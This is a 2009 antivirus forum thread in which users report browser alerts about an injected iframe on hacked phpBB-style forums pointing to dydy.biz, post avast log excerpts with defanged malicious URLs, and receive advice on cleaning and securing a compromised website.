dydy.biz what is?

Good evening. I’m new on this Forum and need help about a trouble to my PC and all PCs connecting to hxxp://www.decarider.com.
Yesterday evening we all received a message from AVAST telling:

“web protection: connection to virus site dydy.biz/in.cgi??20 blocked” ???

This affect only the Forum of hxxp://www.decrider.com and not the gallery.

Can You tell me something about it?
Thank You very much!

Hi Snakebyte,

1 page without user’s consent downloaded and installed malicious software. The last time that malware was found by Google was on 2009-07-07.
Malicious software includes 5 scripting exploits, 3 trojans, 1 exploit.

Malcode was hosted on one domain, e.g.: smicrosoft.ru/.

This site was hosted on 1 network(s) including AS9800 (UNICOM),

Make the link you give there non clickable by altering http with htxp and/or www with wXw…we do not want the curious to get infected with live malware,

At the moment I get this: Empty source - Could not connect to site?
This could mean the site admins are working on it right now, you must understand these injectors of malcode onto trusted reputable sites to silently redirect to malware download sites are active on a massive scale lately,

polonus

OK!
Thank You Polonus.

If it is only on the forum, then it is highly likely that the forum software is out of date and vulnerable to attack, this is the most common means of hacking sites, out of date content management software PHP, SQL, etc. and the forum uses both of those.

You will also have to be more specific about where the alert is and the malware name given as I don’t get any alert in the forum using firefox. Check the avast! Log Viewer (right click the avast ‘a’ icon), Warning section, this contains information on all avast detections. C:\Program Files\Alwil Software\Avast4\ashLogV.exe

  • Or check the source file using notepad C:\Program Files\Alwil Software\Avast4\DATA\log\Warning.log

When posting URLs to suspect sites, change the http to hXXp so the link isn’t active (clickable) avoiding accidental exposure.

OK! i’ll remember to change http with hxxp.

i received, 1 hour ago, an alert message from avast about this link hxxp://masters-woodworks.com/valla.js{gzip} regarding a trojan.

This is the txt of the log file from avast:

09/07/2009 22.06.33 SYSTEM 2028 Sign of “HTML:IFrame-HH [Trj]” has been found in “hxxp://masters-woodworks.com/valla.js{gzip}” file.
09/07/2009 20.25.04 SYSTEM 2028 Sign of “HTML:IFrame-HH [Trj]” has been found in “hxxp://masters-woodworks.com/valla.js{gzip}” file.
06/07/2009 15.40.14 SYSTEM 1640 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
30/06/2009 18.42.33 SYSTEM 1556 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
01/06/2009 22.08.08 SYSTEM 1640 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
01/06/2009 18.05.44 SYSTEM 1640 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
31/05/2009 12.32.35 SYSTEM 1572 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
30/05/2009 16.30.19 SYSTEM 1636 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
29/05/2009 8.34.36 SYSTEM 2032 Sign of “Win32:Gagent [Trj]” has been found in “C:\Documents and Settings\Snake\Documenti\Downloads\OziExplorer PCv3.95.4i +CEv1.12.3 working\OZI EXPLORER 3D 1.07 beta\ozi3d107b_patch.EXE” file.
28/05/2009 15.39.05 SYSTEM 2032 Sign of “VBS:Malware-gen” has been found in “hxxp://www.ilbuffer.com/Documenti/I%20Bug%20di%20Windows%20by%20Dangerous%20Spirit.txt” file.
28/05/2009 15.38.53 SYSTEM 2032 Sign of “VBS:Malware-gen” has been found in “hxxp://www.ilbuffer.com/Documenti/I%20Bug%20di%20Windows%20by%20Dangerous%20Spirit.txt” file.
26/05/2009 19.38.06 SYSTEM 2028 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
25/05/2009 6.23.10 SYSTEM 2036 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
21/05/2009 8.24.04 SYSTEM 2028 AAVM - scanning warning: x_AavmCheckFileDirectEx: hxxp://cdn.mirror.garr.it/mirror2/mirrors/ubuntu-releases/jaunty/ubuntu-9.04-desktop-amd64.iso (C:\WINDOWS\TEMP_avast4_\unp99692897.tmp) returning error, 00000084.
06/05/2009 15.15.17 SYSTEM 1628 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
26/04/2009 17.36.25 SYSTEM 2044 Function setifaceUpdatePackages() has failed. Return code is 0xC0000142, dwRes is C0000142.
17/04/2009 20.49.50 SYSTEM 1640 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
14/04/2009 22.48.49 SYSTEM 1632 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
08/04/2009 11.33.59 SYSTEM 1628 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
30/03/2009 6.57.07 SYSTEM 1960 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
29/03/2009 17.15.22 SYSTEM 2032 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
28/03/2009 19.22.40 SYSTEM 1968 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
27/03/2009 10.51.56 SYSTEM 2000 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
06/03/2009 20.23.53 SYSTEM 2024 Sign of “Win32:Trojan-gen {Other}” has been found in “I:\Razor1911\rzr-crys.exe” file.
27/02/2009 18.10.45 SYSTEM 1608 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
27/02/2009 13.59.54 SYSTEM 1608 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
21/02/2009 17.50.26 SYSTEM 1560 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.
18/02/2009 6.49.01 SYSTEM 1616 Function setifaceUpdatePackages() has failed. Return code is 0x20000004, dwRes is 20000004.

It’s strange that none of the alerts in the log are for decarider.com.

I see now why I’m not getting an alert in firefox as I also use the NoScript add-on and even though I allowed decarider.com in noscript, I have it set to block iframes even so. I now see the noscript blocking of the iframe in the forums, see image2.

See image one the decarider.com home page and there is no iframe tag.

I have checked the page source of the forum home page and there is no iframe tag nor as far as I can see a script tag that could generate an iframe tag. So effectively what this means is that the iframe tag is being injected by the forum software XBM when the page is created. So it looks like the forum software is being exploited, e.g. the site has been hacked.

I am having the exact same problem at hxxp://doctorshealthforum.org. I have scanned my site multiple times and it says there is no virus. What is avast seeing that all the other virus software are not seeing?

What can I do to fix this dydy.biz/in.cgi?20 malicios site error?

Is it Malware? Can anyone see a problem at the site?

Thanks In advance for any help.

The site has been hacked, the forum software appears to be being exploited and an iframe is inserted into the page, see image1. This tries to run a script on the dydy.biz site.

The dydy.biz site is on the avast malicious site list (it is a Russian Federation registered domain), so avast alerts and blocks the attempt to get to this site and run the script. I use firefox with NoScript which blocks that iframe from running which is another level of protection.

If I try to reach dydy.biz directly then avast blocks it and I get an pop-up from both firefox and the network shield blocks the malicious site, image 2&3.

How can I get rid of the IFrame and make sure they don’t hack it again?

You need to update the forum software and check any other content management software (PHP, SQL, WordPress, etc.) and ensure it is also up to date, change all associated passwords.

Commonly this is in the template pages, but I don’t know how your site is put together or what software it uses. The problem is the pages are created by the forum software and when viewing the view page source function in the browser, you don’t see the iframe tag that is being inserted.

The only reason you know it is there is when using firefox with noscript (with iframes blocked) as this shows a place holder where the iframe would have been. Then there is avast blocking access to the site which is contained within the iframe.

I would say you need to speak with your host also and see if they can com up with a plan that they/you can close the vulnerabilities that allow the site to be hacked.

  • This is commonly down to old content management software being vulnerable, see this example of a HOSTs response to a hacked site.
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

  1. check all index pages for any signs of java script injected into their coding. On windows servers check any “default.aspx” or
    “default.cfm” pages as those are popular targets too.

  2. Remove any “rouge” files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
    changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

  3. Check all .htaccess files, as hackers like to load re-directs into them.

  4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
    “strong” password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.

Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.